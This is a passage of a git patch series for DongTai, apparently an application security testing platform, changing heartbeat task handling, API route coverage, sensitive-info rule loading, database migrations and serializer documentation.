b/dongtai_web/views/project_token.py index 04a687f28..70baeb4c9 100644 --- a/dongtai_web/views/project_token.py +++ b/dongtai_web/views/project_token.py @@ -18,7 +18,7 @@ def get(self, request, pk): return R.success( data={ "id": project.id, - "token": project.token, + "token": f"PROJECT{project.token}", } ) return R.failure(status=203, msg=_("no permission")) From 287102d068ccbde8bb7c225a206cb3a16ede5590 Mon Sep 17 00:00:00 2001 From: st1020 Date: Wed, 13 Sep 2023 16:31:59 +0800 Subject: [PATCH 094/114] fix: heartbeat task error --- dongtai_conf/celery.py | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/dongtai_conf/celery.py b/dongtai_conf/celery.py index d1221183c..9924a2326 100644 --- a/dongtai_conf/celery.py +++ b/dongtai_conf/celery.py @@ -54,6 +54,11 @@ Exchange("dongtai-es-save-task"), routing_key="dongtai-es-save-task", ), + Queue( + "dongtai-update-heartbeat", + Exchange("dongtai-update-heartbeat"), + routing_key="dongtai-update-heartbeat", + ), # cronjob Queue( "dongtai-periodic-task", @@ -118,6 +123,10 @@ "exchange": "dongtai-es-save-task", "routing_key": "dongtai-es-save-task", }, + "dongtai_protocol.report.handler.heartbeat_handler.update_heartbeat": { + "exchange": "dongtai-update-heartbeat", + "routing_key": "dongtai-update-heartbeat", + }, # cronjob "dongtai_engine.tasks.update_agent_status": { "exchange": "dongtai-periodic-task", From 92316dc3e26312ad14482e6587b6cf666dc12cac Mon Sep 17 00:00:00 2001 From: bidaya0 Date: Wed, 13 Sep 2023 16:59:03 +0800 Subject: [PATCH 095/114] feat/api route is cover. --- .../handler/saas_method_pool_handler.py | 27 +++---------------- 1 file changed, 4 insertions(+), 23 deletions(-) diff --git a/dongtai_protocol/report/handler/saas_method_pool_handler.py b/dongtai_protocol/report/handler/saas_method_pool_handler.py index fdb5047cf..d0203b9e2 100644 --- a/dongtai_protocol/report/handler/saas_method_pool_handler.py +++ b/dongtai_protocol/report/handler/saas_method_pool_handler.py @@ -17,13 +17,11 @@ from dongtai_common.models.agent import IastAgent from dongtai_common.models.agent_method_pool import MethodPool from dongtai_common.models.api_route import ( - FromWhereChoices, - HttpMethod, IastApiMethod, - IastApiMethodHttpMethodRelation, IastApiParameter, IastApiRoute, ) +from dongtai_common.models.api_route_v2 import IastApiRouteV2 from dongtai_common.models.replay_method_pool import IastAgentMethodPoolReplay from dongtai_common.models.replay_queue import IastReplayQueue from dongtai_common.models.res_header import ( @@ -111,6 +109,7 @@ def save(self): ) # update_api_route_deatil(self.agent_id, self.http_uri, self.http_method, # params_dict) + add_new_api_route(self.agent, self.http_uri, self.http_method) if self.http_replay: # 保存数据至重放请求池 replay_id = headers.get("dongtai-replay-id") @@ -412,27 +411,9 @@ def add_new_api_route(agent: IastAgent, path, method): logger.info(f"found cache api_route-{agent.id}-{path}-{method} ,skip its insert") return try: - api_method, is_create = IastApiMethod.objects.get_or_create(method=method.upper()) - http_method, _ = HttpMethod.objects.get_or_create(method=method.upper()) - IastApiMethodHttpMethodRelation.objects.get_or_create( - api_method_id=api_method.id, http_method_id=http_method.id - ) - api_route, is_create = IastApiRoute.objects.get_or_create( - from_where=FromWhereChoices.FROM_METHOD_POOL, - method_id=api_method.id, - path=path, - agent_id=agent.id, - project_id=agent.bind_project_id, - project_version_id=agent.project_version_id, - ) - except (IntegrityError, MultipleObjectsReturned) as e: - logger.info(e) - logger.debug(e, exc_info=e) - try: - api_method, is_create = IastApiMethod.objects.get_or_create(method=method.upper()) - IastApiRoute.objects.filter( + IastApiRouteV2.objects.filter( path=path, - method_id=api_method.id, + method=method.lower(), project_id=agent.bind_project_id, project_version_id=agent.project_version_id, ).update(is_cover=1) From ccc8baa27521862ce7730f53c29710491197393e Mon Sep 17 00:00:00 2001 From: bidaya0 Date: Wed, 13 Sep 2023 17:01:53 +0800 Subject: [PATCH 096/114] feat/api route is cover. --- dongtai_conf/settings.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/dongtai_conf/settings.py b/dongtai_conf/settings.py index 08994e0d9..dfaf4d211 100644 --- a/dongtai_conf/settings.py +++ b/dongtai_conf/settings.py @@ -119,8 +119,8 @@ def get_installed_apps(): "PAGE_SIZE": 20, "DEFAULT_PAGINATION_CLASS": ["django.core.paginator"], "DEFAULT_AUTHENTICATION_CLASSES": [ - "dongtai_common.common.utils.ProjectTokenAuthentication", "rest_framework.authentication.SessionAuthentication", + "dongtai_common.common.utils.ProjectTokenAuthentication", "dongtai_common.common.utils.DepartmentTokenAuthentication", "rest_framework.authentication.TokenAuthentication", ], From b1111299a0f723c60ae5c5805257cd65585d26b1 Mon Sep 17 00:00:00 2001 From: st1020 Date: Wed, 13 Sep 2023 18:36:42 +0800 Subject: [PATCH 097/114] fix: heartbeat task error --- dongtai_protocol/report/handler/heartbeat_handler.py | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/dongtai_protocol/report/handler/heartbeat_handler.py b/dongtai_protocol/report/handler/heartbeat_handler.py index a8c9f95eb..d618d5bc1 100644 --- a/dongtai_protocol/report/handler/heartbeat_handler.py +++ b/dongtai_protocol/report/handler/heartbeat_handler.py @@ -5,6 +5,7 @@ from typing import Any from celery import shared_task +from celery_singleton import Singleton from django.core.cache import cache from django.db.models import Q, QuerySet from django.utils.translation import gettext_lazy as _ @@ -31,7 +32,7 @@ def check_agent_incache(agent_id): return bool(cache.get(f"heartbeat-{agent_id}")) -@shared_task +@shared_task(base=Singleton) def update_heartbeat(agent_id: int, defaults: dict[str, Any]): IastHeartbeat.objects.update_or_create(agent_id=agent_id, defaults=defaults) IastAgent.objects.update_or_create(pk=agent_id, defaults={"is_running": 1, "online": 1}) @@ -66,8 +67,6 @@ def has_permission(self): def save_heartbeat(self): default_dict = {"dt": int(time.time())} - if not check_agent_incache(self.agent_id): - update_heartbeat.delay(agent_id=self.agent_id, defaults=default_dict) if self.return_queue == 1: default_dict["req_count"] = self.req_count default_dict["report_queue"] = self.report_queue From abfba689c1d9c306c43b29ad0bb30085dbb5b049 Mon Sep 17 00:00:00 2001 From: st1020 Date: Wed, 13 Sep 2023 18:47:25 +0800 Subject: [PATCH 098/114] feat: sensitive info rule add system type --- .../management/commands/load_hook_strategy.py | 31 +++++++++++++++++++ .../0024_iastsensitiveinforule_system_type.py | 17 ++++++++++ dongtai_common/models/sensitive_info.py | 1 + dongtai_web/views/sensitive_info_rule.py | 5 +-- 4 files changed, 52 insertions(+), 2 deletions(-) create mode 100644 dongtai_common/migrations/0024_iastsensitiveinforule_system_type.py diff --git a/deploy/commands/management/commands/load_hook_strategy.py b/deploy/commands/management/commands/load_hook_strategy.py index cd1240a0c..13180b4a6 100644 --- a/deploy/commands/management/commands/load_hook_strategy.py +++ b/deploy/commands/management/commands/load_hook_strategy.py @@ -3,9 +3,11 @@ from collections import OrderedDict from django.core.management.base import BaseCommand +from django.db.models import Q from dongtai_common.models.hook_strategy import HookStrategy from dongtai_common.models.hook_type import HookType +from dongtai_common.models.sensitive_info import IastSensitiveInfoRule from dongtai_common.models.strategy import IastStrategyModel from dongtai_common.utils.validate import save_hook_stratefile_sha1sum from dongtai_conf.settings import BASE_DIR @@ -23,6 +25,9 @@ def handle(self, *args, **options): POLICY_DIR = os.path.join(BASE_DIR, "static/data/") with open(os.path.join(POLICY_DIR, "vul_strategy.json")) as fp: full_strategies = json.load(fp, object_pairs_hook=OrderedDict) + if os.path.exists(os.path.join(POLICY_DIR, "sensitive_info_strategy.json")): + with open(os.path.exists(os.path.join(POLICY_DIR, "sensitive_info_strategy.json"))) as fp: + full_strategies.extend(json.load(fp, object_pairs_hook=OrderedDict)) strategy_dict = {} for strategy in full_strategies: if IastStrategyModel.objects.filter( @@ -160,4 +165,30 @@ def handle(self, *args, **options): hook_strategy["language_id"] = v HookStrategy.objects.create(hooktype=policy_hook_type, **hook_strategy) save_hook_stratefile_sha1sum() + + sensitive_info_rule = [] + if os.path.exists(os.path.join(POLICY_DIR, "sensitive_info_rule.json")): + with open(os.path.join(POLICY_DIR, "sensitive_info_rule.json")) as fp: + sensitive_info_rule = json.load(fp, object_pairs_hook=OrderedDict) + sensitive_info_rule_ids = [] + for rule in sensitive_info_rule: + if rule["strategy"] not in strategy_dict: + continue + strategy = strategy_dict[rule["strategy"]] + exist_rule = IastSensitiveInfoRule.objects.filter( + strategy=strategy, pattern_type_id=rule["pattern_type"], pattern=rule["pattern"], system_type=1 + ).first() + if exist_rule: + sensitive_info_rule_ids.append(exist_rule.pk) + else: + obj = IastSensitiveInfoRule.objects.create( + user_id=1, + strategy=strategy, + pattern_type_id=rule["pattern_type"], + pattern=rule["pattern"], + status=1, + system_type=1, + ) + sensitive_info_rule_ids.append(obj.pk) + IastSensitiveInfoRule.objects.filter(~Q(id__in=sensitive_info_rule_ids), system_type=1).delete() self.stdout.write(self.style.SUCCESS("Successfully load strategy .")) diff --git a/dongtai_common/migrations/0024_iastsensitiveinforule_system_type.py b/dongtai_common/migrations/0024_iastsensitiveinforule_system_type.py new file mode 100644 index 000000000..bc9844991 --- /dev/null +++ b/dongtai_common/migrations/0024_iastsensitiveinforule_system_type.py @@ -0,0 +1,17 @@ +# Generated by Django 3.2.20 on 2023-09-13 18:07 + +from django.db import migrations, models + + +class Migration(migrations.Migration): + dependencies = [ + ("dongtai_common", "0023_auto_20230912_1211"), + ] + + operations = [ + migrations.AddField( + model_name="iastsensitiveinforule", + name="system_type", + field=models.IntegerField(default=0), + ), + ] diff --git a/dongtai_common/models/sensitive_info.py b/dongtai_common/models/sensitive_info.py index b5364cac2..af6c9f01f 100644 --- a/dongtai_common/models/sensitive_info.py +++ b/dongtai_common/models/sensitive_info.py @@ -30,6 +30,7 @@ class IastSensitiveInfoRule(models.Model): pattern = models.CharField(default=None, max_length=255) status = models.IntegerField(default=None) latest_time = models.IntegerField(default=get_timestamp) + system_type = models.IntegerField(default=0) class Meta: db_table = "iast_sensitive_info_rule" diff --git a/dongtai_web/views/sensitive_info_rule.py b/dongtai_web/views/sensitive_info_rule.py index ca953d2ca..5f36d1945 100644 --- a/dongtai_web/views/sensitive_info_rule.py +++ b/dongtai_web/views/sensitive_info_rule.py @@ -58,6 +58,7 @@ class Meta: "pattern", "status", "latest_time", + "system_type", ] def get_strategy_name(self, obj): @@ -208,7 +209,7 @@ def update(self, request, pk): except ValidationError as e: return R.failure(data=e.detail) users = self.get_auth_users(request.user) - IastSensitiveInfoRule.objects.filter(pk=pk, user__in=users).update( + IastSensitiveInfoRule.objects.filter(pk=pk, user__in=users, system_type=0).update( **ser.validated_data, latest_time=time.time() ) return R.success(msg=_("update success")) @@ -220,7 +221,7 @@ def update(self, request, pk): ) def destory(self, request, pk): users = self.get_auth_users(request.user) - IastSensitiveInfoRule.objects.filter(pk=pk, user__in=users).update(status=-1) + IastSensitiveInfoRule.objects.filter(pk=pk, user__in=users, system_type=0).update(status=-1) return R.success(msg=_("delete success")) @extend_schema_with_envcheck( From 05fe77c83c8b08ce6e527a475e497349145b8c51 Mon Sep 17 00:00:00 2001 From: st1020 Date: Thu, 14 Sep 2023 11:32:01 +0800 Subject: [PATCH 099/114] fix: heartbeat task error --- dongtai_protocol/report/handler/heartbeat_handler.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/dongtai_protocol/report/handler/heartbeat_handler.py b/dongtai_protocol/report/handler/heartbeat_handler.py index d618d5bc1..f25cc1f6d 100644 --- a/dongtai_protocol/report/handler/heartbeat_handler.py +++ b/dongtai_protocol/report/handler/heartbeat_handler.py @@ -32,7 +32,7 @@ def check_agent_incache(agent_id): return bool(cache.get(f"heartbeat-{agent_id}")) -@shared_task(base=Singleton) +@shared_task(base=Singleton, unique_on=["agent_id"], lock_expiry=20) def update_heartbeat(agent_id: int, defaults: dict[str, Any]): IastHeartbeat.objects.update_or_create(agent_id=agent_id, defaults=defaults) IastAgent.objects.update_or_create(pk=agent_id, defaults={"is_running": 1, "online": 1}) From d88f16b68e40f2b801d5a5b915ff10fff5da49bb Mon Sep 17 00:00:00 2001 From: bidaya0 Date: Thu, 14 Sep 2023 14:40:58 +0800 Subject: [PATCH 100/114] fix: change to directed graph. --- dongtai_common/engine/vul_engine.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/dongtai_common/engine/vul_engine.py b/dongtai_common/engine/vul_engine.py index 643da6d26..69ef30ae9 100644 --- a/dongtai_common/engine/vul_engine.py +++ b/dongtai_common/engine/vul_engine.py @@ -155,7 +155,7 @@ def search(self, method_pool, vul_method_signature, vul_type=None): ) ] # Build a graph - g = nk.Graph(weighted=True, directed=True) + g = nk.DiGraph(weighted=True, directed=True) for pool in self.method_pool: if "sourceType" in pool: vecs = () From b903c7da0585db2f4f7b33275f042b6d0404d537 Mon Sep 17 00:00:00 2001 From: st1020 Date: Thu, 14 Sep 2023 14:46:51 +0800 Subject: [PATCH 101/114] fix: vul status const error --- dongtai_common/utils/const.py | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/dongtai_common/utils/const.py b/dongtai_common/utils/const.py index 2b6a7eacd..d553cd10e 100644 --- a/dongtai_common/utils/const.py +++ b/dongtai_common/utils/const.py @@ -85,7 +85,8 @@ VUL_VERIFYING = 2 VUL_CONFIRMED = 3 VUL_SOLVED = 5 -VUL_IGNORE = 6 +VUL_FIXED = 6 +VUL_IGNORE = 7 # API 操作 tag From a3120c00120ae9413fb34cc7b0ae6f317457dcb8 Mon Sep 17 00:00:00 2001 From: bidaya0 Date: Thu, 14 Sep 2023 18:07:46 +0800 Subject: [PATCH 102/114] feat: add constratin in vec. --- dongtai_common/models/request_chains.py | 1 + 1 file changed, 1 insertion(+) diff --git a/dongtai_common/models/request_chains.py b/dongtai_common/models/request_chains.py index fc1074fde..3aea01273 100644 --- a/dongtai_common/models/request_chains.py +++ b/dongtai_common/models/request_chains.py @@ -144,6 +144,7 @@ class IastAgentRequestChainsTopoGraphVec(models.Model): class Meta: managed = get_managed() db_table = "iast_request_chains_topo_graph_vecs" + unique_together = (("graph_hash", "source_node_tag", "target_node_tag"),) class IastAgentRequestChainsTotalProjectVersionGraphVec(models.Model): From f03571614e077d5b0a912cef093b25d690c8c3d6 Mon Sep 17 00:00:00 2001 From: bidaya0 Date: Thu, 14 Sep 2023 18:07:54 +0800 Subject: [PATCH 103/114] feat: add constratin in vec. --- ...trequestchainstopographvec_unique_together.py | 16 ++++++++++++++++ 1 file changed, 16 insertions(+) create mode 100644 dongtai_common/migrations/0025_alter_iastagentrequestchainstopographvec_unique_together.py diff --git a/dongtai_common/migrations/0025_alter_iastagentrequestchainstopographvec_unique_together.py b/dongtai_common/migrations/0025_alter_iastagentrequestchainstopographvec_unique_together.py new file mode 100644 index 000000000..69f3f9473 --- /dev/null +++ b/dongtai_common/migrations/0025_alter_iastagentrequestchainstopographvec_unique_together.py @@ -0,0 +1,16 @@ +# Generated by Django 3.2.20 on 2023-09-14 18:03 + +from django.db import migrations + + +class Migration(migrations.Migration): + dependencies = [ + ("dongtai_common", "0024_iastsensitiveinforule_system_type"), + ] + + operations = [ + migrations.AlterUniqueTogether( + name="iastagentrequestchainstopographvec", + unique_together={("graph_hash", "source_node_tag", "target_node_tag")}, + ), + ] From 7a985ecd908877e03ff3843ae8b4873d097cf3e1 Mon Sep 17 00:00:00 2001 From: bidaya0 Date: Thu, 14 Sep 2023 18:50:59 +0800 Subject: [PATCH 104/114] feat: add some doc. --- dongtai_common/models/asset_vul_v2.py | 33 ++++----- dongtai_common/serializers/assetv2.py | 13 ++-- dongtai_common/serializers/assetvulv2.py | 10 +-- dongtai_web/aggr_vul/app_vul_list.py | 70 ++++++++++++++++--- dongtai_web/dongtai_sca/views/newpackage.py | 29 +++++--- .../dongtai_sca/views/newpackagesummary.py | 2 +- .../dongtai_sca/views/newpackagevuls.py | 2 +- dongtai_web/serializers/aggregation.py | 6 +- dongtai_web/views/project_version_list.py | 2 +- dongtai_web/views/projects.py | 2 +- dongtai_web/views/vul_details.py | 69 ++++++++++++++++-- 11 files changed, 176 insertions(+), 62 deletions(-) diff --git a/dongtai_common/models/asset_vul_v2.py b/dongtai_common/models/asset_vul_v2.py index f71c31013..d0a11ebfe 100644 --- a/dongtai_common/models/asset_vul_v2.py +++ b/dongtai_common/models/asset_vul_v2.py @@ -5,27 +5,24 @@ class IastAssetVulV2(models.Model): - vul_name = models.CharField(max_length=255, blank=True) - vul_name_zh = models.CharField(max_length=255, blank=True) - vul_detail = models.TextField() - vul_detail_zh = models.TextField(blank=True) + vul_name = models.CharField(max_length=255, blank=True, help_text="漏洞名") + vul_name_zh = models.CharField(max_length=255, blank=True, help_text="漏洞名(中文)") + vul_detail = models.TextField(help_text="漏洞详情") + vul_detail_zh = models.TextField(blank=True, help_text="漏洞详情(中文)") # 漏洞类型等级 level = models.IntegerField( - choices=AssetRiskLevel.choices, - blank=True, - db_column="level_id", - default=AssetRiskLevel.LOW, + choices=AssetRiskLevel.choices, blank=True, db_column="level_id", default=AssetRiskLevel.LOW, help_text="漏洞等级" ) - update_time = models.IntegerField() - create_time = models.IntegerField() - references = models.JSONField(default=list) - change_time = models.IntegerField() - published_time = models.IntegerField() - vul_id = models.CharField(max_length=255, unique=True, blank=True) - vul_type = models.JSONField() - vul_codes = models.JSONField() - affected_versions = models.JSONField() - unaffected_versions = models.JSONField() + update_time = models.IntegerField(help_text="更新时间") + create_time = models.IntegerField(help_text="创建时间") + references = models.JSONField(default=list, help_text="引用文章") + change_time = models.IntegerField(help_text="修改时间") + published_time = models.IntegerField(help_text="发布时间") + vul_id = models.CharField(max_length=255, unique=True, blank=True, help_text="漏洞id") + vul_type = models.JSONField(help_text="漏洞类型") + vul_codes = models.JSONField(help_text="漏洞编号") + affected_versions = models.JSONField(help_text="影响版本") + unaffected_versions = models.JSONField(help_text="不影响版本") class Meta: managed = True diff --git a/dongtai_common/serializers/assetv2.py b/dongtai_common/serializers/assetv2.py index e0c5c8879..430cd8700 100644 --- a/dongtai_common/serializers/assetv2.py +++ b/dongtai_common/serializers/assetv2.py @@ -7,12 +7,12 @@ class PackeageScaAssetDetailSerializer(serializers.ModelSerializer): - affected_versions = serializers.ListField(source="package_fullname.affected_versions") - unaffected_versions = serializers.ListField(source="package_fullname.unaffected_versions") - language = serializers.SerializerMethodField() - level_name = serializers.CharField(source="get_level_display") - level_id = serializers.IntegerField(source="level") - vul_count_groupby_level = serializers.ListField(source="get_vul_count_groupby_level") + affected_versions = serializers.ListField(source="package_fullname.affected_versions", help_text="影响版本") + unaffected_versions = serializers.ListField(source="package_fullname.unaffected_versions", help_text="安全版本") + language = serializers.SerializerMethodField(help_text="语言") + level_name = serializers.CharField(source="get_level_display", help_text="危险等级名") + level_id = serializers.IntegerField(source="level", help_text="危险等级id") + vul_count_groupby_level = serializers.ListField(source="get_vul_count_groupby_level", help_text="漏洞统计") class Meta: model = AssetV2Global @@ -38,7 +38,6 @@ class Meta: "aql", "language", "vul_count_groupby_level", - "is_focus", ] def get_language(self, obj) -> str: diff --git a/dongtai_common/serializers/assetvulv2.py b/dongtai_common/serializers/assetvulv2.py index a642f81f7..5b49bd391 100644 --- a/dongtai_common/serializers/assetvulv2.py +++ b/dongtai_common/serializers/assetvulv2.py @@ -5,11 +5,11 @@ class PackageVulSerializer(serializers.ModelSerializer): - vul_name = serializers.SerializerMethodField() - vul_detail = serializers.SerializerMethodField() - references = serializers.SerializerMethodField() - level_name = serializers.CharField(source="get_level_display") - level_id = serializers.IntegerField(source="level") + vul_name = serializers.SerializerMethodField(help_text="漏洞名") + vul_detail = serializers.SerializerMethodField(help_text="漏洞详情") + references = serializers.SerializerMethodField(help_text="引用文章") + level_name = serializers.CharField(source="get_level_display", help_text="等级名") + level_id = serializers.IntegerField(source="level", help_text="等级id") class Meta: model = IastAssetVulV2 diff --git a/dongtai_web/aggr_vul/app_vul_list.py b/dongtai_web/aggr_vul/app_vul_list.py index 3157ef330..d698bcf5a 100644 --- a/dongtai_web/aggr_vul/app_vul_list.py +++ b/dongtai_web/aggr_vul/app_vul_list.py @@ -13,7 +13,6 @@ from dongtai_common.common.utils import make_hash from dongtai_common.endpoint import R, UserEndPoint from dongtai_common.models import APP_LEVEL_RISK, APP_VUL_ORDER -from dongtai_common.models.agent_method_pool import VulMethodPool from dongtai_common.models.dast_integration import IastDastIntegrationRelation from dongtai_common.models.vulnerablity import ( IastVulnerabilityDocument, @@ -23,24 +22,81 @@ from dongtai_common.utils.const import OPERATE_GET from dongtai_common.utils.db import SearchLanguageMode from dongtai_conf import settings -from dongtai_conf.patch import patch_point, to_patch +from dongtai_conf.patch import patch_point from dongtai_conf.settings import ELASTICSEARCH_STATE from dongtai_engine.elatic_search.data_correction import data_correction_interpetor from dongtai_web.aggregation.aggregation_common import turnIntListOfStr from dongtai_web.serializers.aggregation import AggregationArgsSerializer from dongtai_web.serializers.vul import VulSerializer -from dongtai_web.utils import extend_schema_with_envcheck +from rest_framework import serializers +from dongtai_web.utils import get_response_serializer +from drf_spectacular.utils import extend_schema INT_LIMIT: int = 2**64 - 1 +class AppVulSerializer(serializers.ModelSerializer): + level_name = serializers.CharField() + server_type = serializers.CharField() + is_header_vul = serializers.CharField() + agent__project_name = serializers.CharField() + agent__server__container = serializers.CharField() + agent__language = serializers.CharField() + agent__bind_project_id = serializers.CharField() + header_vul_urls = serializers.ListField() + dastvul__vul_type = serializers.CharField() + dastvul_count = serializers.CharField() + dast_validation_status = serializers.CharField() + strategy__vul_name = serializers.CharField() + project__name = serializers.CharField() + server__container = serializers.CharField() + project_version__version_name = serializers.CharField() + + class Meta: + model = IastVulnerabilityModel + fields = [ + "id", + "uri", + "http_method", + "top_stack", + "bottom_stack", + "level_id", + "taint_position", + "status_id", + "first_time", + "latest_time", + "strategy__vul_name", + "language", + "project__name", + "server__container", + "project_id", + "strategy_id", + "project_version_id", + "project_version__version_name", + "level_name", + "server_type", + "is_header_vul", + "agent__project_name", + "agent__server__container", + "agent__language", + "agent__bind_project_id", + "header_vul_urls", + "dastvul__vul_type", + "dastvul_count", + "dast_validation_status", + ] + + +_NewResponseSerializer = get_response_serializer(AppVulSerializer(many=True)) + + class GetAppVulsList(UserEndPoint): - @extend_schema_with_envcheck( + @extend_schema( request=AggregationArgsSerializer, - tags=[_("Vulnerability"), OPERATE_GET], + tags=[_("Vulnerability"), OPERATE_GET, "集成"], summary="应用漏洞列表", + responses={200: _NewResponseSerializer}, ) - @to_patch def post(self, request): """ :param request: @@ -178,7 +234,6 @@ def post(self, request): lambda: 0, {item["iastvul_id"]: item["dastvul_count"] for item in dastvul_rel_count_res}, ) - has_vul_method_pool_set = set(VulMethodPool.objects.filter(vul_id__in=vul_ids).values_list("vul_id", flat=True)) if vul_data: for item in vul_data: item["level_name"] = APP_LEVEL_RISK.get(str(item["level_id"]), "") @@ -192,7 +247,6 @@ def post(self, request): item["dastvul__vul_type"] = dast_vul_types_dict[item["id"]] item["dastvul_count"] = dastvul_rel_count_res_dict[item["id"]] item["dast_validation_status"] = bool(dastvul_rel_count_res_dict[item["id"]]) - item["has_vul_method_pool"] = item["id"] in has_vul_method_pool_set end["data"].append(item) # all Iast Vulnerability Status status = IastVulnerabilityStatus.objects.all() diff --git a/dongtai_web/dongtai_sca/views/newpackage.py b/dongtai_web/dongtai_sca/views/newpackage.py index dbcd2a57a..f290bdb34 100644 --- a/dongtai_web/dongtai_sca/views/newpackage.py +++ b/dongtai_web/dongtai_sca/views/newpackage.py @@ -17,14 +17,22 @@ class PackageListArgsSerializer(serializers.Serializer): page_size = serializers.IntegerField(default=20, help_text=_("Number per page")) page = serializers.IntegerField(default=1, help_text=_("Page index")) - language_ids = serializers.ListField(required=False, child=serializers.IntegerField(help_text=_("language"))) - license_ids = serializers.ListField(required=False, child=serializers.IntegerField(help_text=_("license"))) - level_ids = serializers.ListField(required=False, child=serializers.IntegerField(help_text=_("level"))) - project_id = serializers.IntegerField(required=False, help_text=_("Page index")) - project_version_id = serializers.IntegerField(required=False, help_text=_("Page index")) - keyword = serializers.CharField(required=False, help_text=_("search_keyword")) - order_field = serializers.ChoiceField(["vul_count", "level"], default="vul_count") - order = serializers.ChoiceField(["desc", "asc"], default="desc") + language_ids = serializers.ListField( + required=False, + child=serializers.IntegerField(help_text=_("language")), + help_text="筛选语言id: 1 Java 2 Python 3 PHP 4 Go", + ) + license_ids = serializers.ListField( + required=False, child=serializers.IntegerField(help_text=_("license")), help_text="筛选, 许可证id, 该id范围可在组件概况获取" + ) + level_ids = serializers.ListField( + required=False, child=serializers.IntegerField(help_text=_("level")), help_text="筛选, 危险等级id" + ) + project_id = serializers.IntegerField(required=False, help_text="项目id") + project_version_id = serializers.IntegerField(required=False, help_text="项目版本id") + keyword = serializers.CharField(required=False, help_text="搜索关键字") + order_field = serializers.ChoiceField(["vul_count", "level"], default="vul_count", help_text="排序字段") + order = serializers.ChoiceField(["desc", "asc"], default="desc", help_text="排序方式") class PackeageScaAssetSerializer(PackeageScaAssetDetailSerializer): @@ -49,7 +57,6 @@ class Meta: "language_id", "aql", "vul_count_groupby_level", - "is_focus", ] @@ -59,7 +66,7 @@ class Meta: class PackageList(UserEndPoint): @extend_schema_with_envcheck_v2( request=PackageListArgsSerializer, - tags=[_("Component"), OPERATE_GET], + tags=[_("Component"), OPERATE_GET, "集成"], summary=_("Component List"), responses={200: _NewResponseSerializer}, ) @@ -85,7 +92,7 @@ def post(self, request): q = q & Q(aql__contains=ser.validated_data["keyword"]) order = ("-" if ser.validated_data["order"] == "desc" else "") + ser.validated_data["order_field"] page_info, data = self.get_paginator( - AssetV2Global.objects.filter(q).order_by("-is_focus", order).all(), + AssetV2Global.objects.filter(q).order_by(order).all(), ser.validated_data["page"], ser.validated_data["page_size"], ) diff --git a/dongtai_web/dongtai_sca/views/newpackagesummary.py b/dongtai_web/dongtai_sca/views/newpackagesummary.py index 251af6c5d..04d572210 100644 --- a/dongtai_web/dongtai_sca/views/newpackagesummary.py +++ b/dongtai_web/dongtai_sca/views/newpackagesummary.py @@ -73,7 +73,7 @@ class Meta: class NewPackageSummary(UserEndPoint): @extend_schema_with_envcheck_v2( parameters=[PackageSummaryArgsSerializer], - tags=[_("Component")], + tags=[_("Component"), "集成"], summary="组件概况", responses={200: FullSummaryResponseSerializer}, ) diff --git a/dongtai_web/dongtai_sca/views/newpackagevuls.py b/dongtai_web/dongtai_sca/views/newpackagevuls.py index cfd5dae5c..034928698 100644 --- a/dongtai_web/dongtai_sca/views/newpackagevuls.py +++ b/dongtai_web/dongtai_sca/views/newpackagevuls.py @@ -23,7 +23,7 @@ class PackageVulsListArgsSerializer(serializers.Serializer): class NewPackageVuls(UserEndPoint): @extend_schema_with_envcheck_v2( - tags=[_("Component")], + tags=[_("Component"), "集成"], summary="组件漏洞列表", parameters=[PackageVulsListArgsSerializer], responses={200: NewPackageVulSResponseSerializer}, diff --git a/dongtai_web/serializers/aggregation.py b/dongtai_web/serializers/aggregation.py index 6bd901d93..275020f91 100644 --- a/dongtai_web/serializers/aggregation.py +++ b/dongtai_web/serializers/aggregation.py @@ -16,8 +16,8 @@ class AggregationArgsSerializer(serializers.Serializer): order_type = serializers.IntegerField(default=0, help_text=_("Order by")) order_type_desc = serializers.IntegerField(default=0, help_text=_("Order by desc")) - bind_project_id = serializers.IntegerField(default=0, help_text=_("bind_project_id")) - project_version_id = serializers.IntegerField(default=0, help_text=_("project_version_id")) + bind_project_id = serializers.IntegerField(default=0, help_text="项目id") + project_version_id = serializers.IntegerField(default=0, help_text="项目版本id") uri = serializers.CharField( required=False, max_length=1024, @@ -40,7 +40,7 @@ class AggregationArgsSerializer(serializers.Serializer): required=False, max_length=100, error_messages={"keywords": _("Length limit exceeded")}, - help_text=_("Keywords select"), + help_text="搜索关键字", ) source_type_str = serializers.CharField( diff --git a/dongtai_web/views/project_version_list.py b/dongtai_web/views/project_version_list.py index 68796a941..b8899bc21 100644 --- a/dongtai_web/views/project_version_list.py +++ b/dongtai_web/views/project_version_list.py @@ -32,7 +32,7 @@ class ProjectVersionList(UserEndPoint): description = _("View application version list") @extend_schema_with_envcheck( - tags=[_("Project")], + tags=[_("Project"), "集成"], summary=_("Projects Version List"), description=_("Get the version information list of the item corresponding to the id"), response_schema=_ProjectVersionListResponseSerializer, diff --git a/dongtai_web/views/projects.py b/dongtai_web/views/projects.py index ed8f8968f..3742acca9 100644 --- a/dongtai_web/views/projects.py +++ b/dongtai_web/views/projects.py @@ -52,7 +52,7 @@ class Projects(UserEndPoint): @extend_schema_with_envcheck( [_ProjectsArgsSerializer], - tags=[_("Project")], + tags=[_("Project"), "集成"], summary=_("Projects List"), description=_("Get the item corresponding to the user, support fuzzy search based on name."), response_schema=_SuccessSerializer, diff --git a/dongtai_web/views/vul_details.py b/dongtai_web/views/vul_details.py index 6aac30b01..b13b05dcd 100644 --- a/dongtai_web/views/vul_details.py +++ b/dongtai_web/views/vul_details.py @@ -9,7 +9,6 @@ from rest_framework import serializers from dongtai_common.endpoint import R, UserEndPoint -from dongtai_common.models.agent_method_pool import VulMethodPool from dongtai_common.models.hook_type import HookType from dongtai_common.models.project import IastProject from dongtai_common.models.project_version import IastProjectVersion @@ -117,8 +116,8 @@ def get_server(self): "command": "", } - @staticmethod def parse_graphy( + self, graphy, extend_black_list: list | None = None, extend_white_list: list | None = None, @@ -136,7 +135,7 @@ def parse_graphy( results = [] try: - if not graphy: + if graphy is None: return results method_note_pool = json.loads(graphy)[0] method_counts = len(method_note_pool) @@ -328,7 +327,6 @@ def get_vul(self, projects): "method_pool_id": vul.method_pool_id, "project_id": project_id, "is_need_http_detail": is_need_http_detail(strategy_name), - "has_vul_method_pool": VulMethodPool.objects.filter(vul_id=vul.id).exists(), } def get_strategy(self): @@ 